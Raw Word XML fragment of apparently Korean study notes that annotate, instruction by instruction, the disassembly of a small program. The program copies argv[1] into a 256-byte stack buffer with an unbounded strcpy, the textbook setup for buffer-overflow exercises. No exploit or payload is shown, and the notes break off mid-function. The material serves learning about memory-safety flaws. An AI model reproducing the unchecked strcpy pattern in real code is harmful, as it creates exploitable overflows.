                            <w:pPr>
                              <w:ind w:firstLineChars="450" w:firstLine="90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DF155F">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:sym w:font="Wingdings" w:char="F0DF"/>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>-------------------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155D2" w:rsidRDefault="00C155D2"/>
          <w:p w:rsidR="00DF155F" w:rsidRDefault="00DF155F"/>
          <w:p w:rsidR="00C155D2" w:rsidRDefault="00C155D2"/>
          <w:p w:rsidR="00C155D2" w:rsidRDefault="00C155D2">
            <w:r w:rsidRPr="00C155D2">
              <w:t>0x8048430 &lt;main&gt;:       push   %ebp</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidR="00DF155F">
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="004C025F">
              <w:t xml:space="preserve">          </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">-&gt;  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> ebp값을 스택에 넣는다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C155D2" w:rsidRDefault="00C155D2">
            <w:r w:rsidRPr="00C155D2">
              <w:t>0x8048431 &lt;main+1&gt;:     mov    %ebp,%esp</w:t>
            </w:r>
            <w:r w:rsidR="00DF155F">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00BD70A1">
              <w:t xml:space="preserve">          </w:t>
            </w:r>
            <w:r w:rsidR="00DF155F">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidR="00DF155F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">-&gt;   esp값을 </w:t>
            </w:r>
            <w:r w:rsidR="00DF155F">
              <w:t>ebp</w:t>
            </w:r>
            <w:r w:rsidR="00DF155F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>에 넣는다</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DF155F" w:rsidRDefault="00DF155F">
            <w:r w:rsidRPr="00DF155F">
              <w:t>0x8048433 &lt;main+3&gt;:     sub    %esp,0x100</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r w:rsidR="00BD70A1">
              <w:t xml:space="preserve">          </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> -&gt;  </w:t>
            </w:r>
            <w:r w:rsidRPr="00BD70A1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>0x100</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD70A1">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>(16</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD70A1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>의2제곱=256</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD70A1">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD70A1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t xml:space="preserve">을 </w:t>
            </w:r>
            <w:r w:rsidRPr="00BD70A1">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>esp</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD70A1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>에서 뺀다</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DF155F" w:rsidRDefault="00785E0C">
            <w:r w:rsidRPr="00785E0C">
              <w:t>0x8048439 &lt;main+9&gt;:     cmp    DWORD PTR [%ebp+8],1</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> -&gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>e</w:t>
            </w:r>
            <w:r>
              <w:t>bp+8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>주소에 있는 값(a</w:t>
            </w:r>
            <w:r>
              <w:t>rgc)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">와 </w:t>
            </w:r>
            <w:r>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>의 값을 비교</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00785E0C" w:rsidRDefault="00785E0C"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   </w:t>
            </w:r>
            <w:r w:rsidR="008B06AF">
              <w:t xml:space="preserve">                      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">이유 </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:r>
              <w:t>rgc &lt; 2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00785E0C" w:rsidRDefault="008B06AF">
            <w:r w:rsidRPr="008B06AF">
              <w:t>0x804843d &lt;main+13&gt;:    jg     0x8048456 &lt;main+38&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> -&gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>조건부 점프.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">             </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">이유 </w:t>
            </w:r>
            <w:r>
              <w:t>: argc&gt;=2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>인경우</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B06AF" w:rsidRDefault="008B06AF"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C155D2" w:rsidRPr="00B77FED" w:rsidTr="007B012B">
        <w:trPr>
          <w:trHeight w:val="14152"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10603" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00C155D2" w:rsidRDefault="00384544">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00384544">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>0x804843f &lt;main+15&gt;:    push   0x80484e0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidR="00BD70A1">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">-&gt;   </w:t>
            </w:r>
            <w:r w:rsidR="00BD70A1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>주소값 밀어넣기</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00384544" w:rsidRDefault="00384544">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00384544">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>0x8048444 &lt;main+20&gt;:    call   0x8048350 &lt;printf&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">  -&gt; printf </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>함수가 있는 주소값 호출</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00384544" w:rsidRDefault="00384544">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00384544">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>0x8048449 &lt;main+25&gt;:    add    %esp,4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidR="00BD70A1">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">         </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">  -&gt;  4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">를 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>esp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>값에 더한다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00384544" w:rsidRDefault="00384544">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00384544">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>0x804844e &lt;main+30&gt;:    call   0x8048360 &lt;exit&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00BD70A1">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">  -&gt; exit </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>함수 주소값 호출</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00384544" w:rsidRDefault="00384544">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00384544">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>0x8048453 &lt;main+35&gt;:    add    %esp,4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidR="00BD70A1">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">         </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">  -&gt;   4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">를 </w:t>
            </w:r>
            <w:r w:rsidR="004C025F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>e</w:t>
            </w:r>
            <w:r w:rsidR="004C025F">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>sp</w:t>
            </w:r>
            <w:r w:rsidR="004C025F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>값에 더한다</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004C025F" w:rsidRDefault="004C025F">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004C025F">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>0x8048456 &lt;main+38&gt;:    mov    %eax,DWORD PTR [%ebp+12]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">  -&gt;  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>e</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>bp+12(</w:t>
            </w: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>rgv</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>포인터</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">주소를 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>eax</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>에 저장</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004C025F" w:rsidRDefault="004C025F">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004C025F">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>0x8048459 &lt;main+41&gt;:    add    %eax,4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00BD70A1">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">           </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> -&gt;  4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">를 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>eax</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">값에 더함 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">(argv </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>배열 인자 주소</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004C025F" w:rsidRDefault="004C025F">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004C025F">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>0x804845c &lt;main+44&gt;:    mov    %edx,DWORD PTR [%eax]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">  -&gt;  eax</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">의 주소값을 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>edx</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>에 넣음</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004C025F" w:rsidRDefault="004C025F">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004C025F">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>0x804845e &lt;main+46&gt;:    push   %edx</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00BD70A1">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">             </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> -&gt;   edx</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>값을 밀어넣음.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004C025F" w:rsidRDefault="004C025F">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004C025F">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>0x804845f &lt;main+47&gt;:    lea    %eax,[%ebp-256]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00BD70A1">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">  -&gt;   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>e</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>pb-256(buffer)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">주소를 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>eax</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>에 저장</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004C025F" w:rsidRDefault="004C025F">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004C025F">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>0x8048465 &lt;main+53&gt;:    push   %eax</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00BD70A1">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">               </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">-&gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>e</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>ax</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>값을 저장</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004C025F" w:rsidRDefault="009A4CE8">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009A4CE8">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>0x8048466 &lt;main+54&gt;:    call   0x8048370 &lt;strcpy&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00BD70A1">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">-&gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">trcpy </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>함수 호출</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009A4CE8" w:rsidRDefault="009A4CE8">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009A4CE8">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>0x804846b &lt;main+59&gt;:    add    %esp,8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidR="00BD70A1">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">           </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>-&gt;  8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">을 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>esp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>의값에 더한다</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009A4CE8" w:rsidRDefault="009A4CE8">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009A4CE8">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>0x804846e &lt;main+62&gt;:    lea    %eax,[%ebp-256]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidR="00BD70A1">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">-&gt;  </w:t>
            </w:r>
            <w:r w:rsidRPr="001E478E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>e</w:t>
            </w:r>
            <w:r w:rsidRPr="001E478E">
              <w:rPr>
                <w:noProof/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>pb-256</w:t>
            </w:r>
            <w:r w:rsidRPr="001E478E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t xml:space="preserve">의 주소를 넣는다 </w:t>
            </w:r>
            <w:r w:rsidRPr="001E478E">
              <w:rPr>
                <w:noProof/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Eax = buffer</w:t>
            </w:r>
            <w:r w:rsidRPr="001E478E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
              </w:rPr>
              <w:t>의포인터)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004C025F" w:rsidRDefault="009A4CE8">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009A4CE8">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>0x8048474 &lt;main+68&gt;:    push   %eax</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidR="00BD70A1">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">             </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>-&gt;  eax</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>의 주소 저장</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009A4CE8" w:rsidRDefault="009A4CE8">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009A4CE8">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>0x8048475 &lt;main+69&gt;:    push   0x80484ec</w:t>
            </w:r>
            <w:r w:rsidR="00F57151">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidR="00BD70A1">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">         </w:t>
            </w:r>
            <w:r w:rsidR="00F57151">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">-&gt;  </w:t>
            </w:r>
            <w:r w:rsidR="00F57151">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>주소값 저장</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00384544" w:rsidRDefault="00F57151">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F57151">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>0x804847a &lt;main+74&gt;:    call   0x8048350 &lt;printf&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00BD70A1">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> -&gt;  printf </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>호출</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00384544" w:rsidRDefault="00F57151">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F57151">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>0x804847f &lt;main+79&gt;:    add    %esp,8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidR="00BD70A1">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>-&gt;  8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">을 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>esp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>값에 더한다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F57151" w:rsidRDefault="00F57151">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F57151">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>0x8048482 &lt;main+82&gt;:    leave</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidR="00BD70A1">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">                     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">-&gt;  </w:t>
            </w:r>
            <w:r w:rsidR="000724C2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
